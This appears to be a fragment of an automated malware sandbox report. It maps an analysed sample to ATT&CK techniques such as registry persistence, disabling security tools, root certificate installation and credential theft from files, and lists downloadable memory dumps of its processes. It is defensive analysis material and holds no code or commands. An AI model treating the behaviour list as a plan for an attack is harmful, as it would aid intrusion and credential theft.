Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1152-61-0x0000000000280000-0x000000000055A000-memory.dmp

Filesize
2.9MB

Download
memory/1152-80-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download
memory/1152-78-0x0000000002250000-0x0000000002282000-memory.dmp

Filesize
200KB

Download
memory/1152-66-0x000000001B140000-0x000000001B142000-memory.dmp

Filesize
8KB

Download
memory/1152-65-0x000000001A810000-0x000000001A8C0000-memory.dmp

Filesize
704KB

Download
memory/1152-64-0x0000000000240000-0x0000000000246000-memory.dmp

Filesize
24KB

Download
memory/1152-79-0x000000001B990000-0x000000001BA32000-memory.dmp

Filesize
648KB

Download
memory/1152-76-0x0000000000690000-0x000000000069C000-memory.dmp

Filesize
48KB

Download
memory/1152-75-0x0000000000830000-0x0000000000860000-memory.dmp

Filesize
192KB

Download
memory/1152-63-0x000000001B400000-0x000000001B742000-memory.dmp

Filesize
3.3MB

Download
memory/1152-62-0x000007FEF4E80000-0x000007FEF586C000-memory.dmp

Filesize
9.9MB

Download
memory/1152-77-0x0000000002090000-0x00000000020AA000-memory.dmp

Filesize
104KB

Download
memory/1380-82-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

Filesize
8KB

Download
memory/1408-86-0x00000000752A1000-0x00000000752A3000-memory.dmp

Filesize
8KB

Download
memory/1620-72-0x0000000000A30000-0x0000000000A31000-memory.dmp

Filesize
4KB

Download
memory/1620-70-0x0000000000E30000-0x00000000017B6000-memory.dmp

Filesize
9.5MB

Download
memory/1620-71-0x0000000073FF0000-0x00000000746DE000-memory.dmp

Filesize
6.9MB

Download
memory/1620-117-0x0000000000A35000-0x0000000000A46000-memory.dmp

Filesize
68KB

Download
memory/1792-57-0x0000000004B90000-0x0000000004B91000-memory.dmp

Filesize
4KB

Download
memory/1792-56-0x00000000002D0000-0x00000000005CE000-memory.dmp

Filesize
3.0MB

Download
memory/1792-54-0x00000000002D0000-0x00000000005CE000-memory.dmp

Filesize
3.0MB

Download
memory/1792-55-0x0000000073FF0000-0x00000000746DE000-memory.dmp

Filesize
6.9MB

Download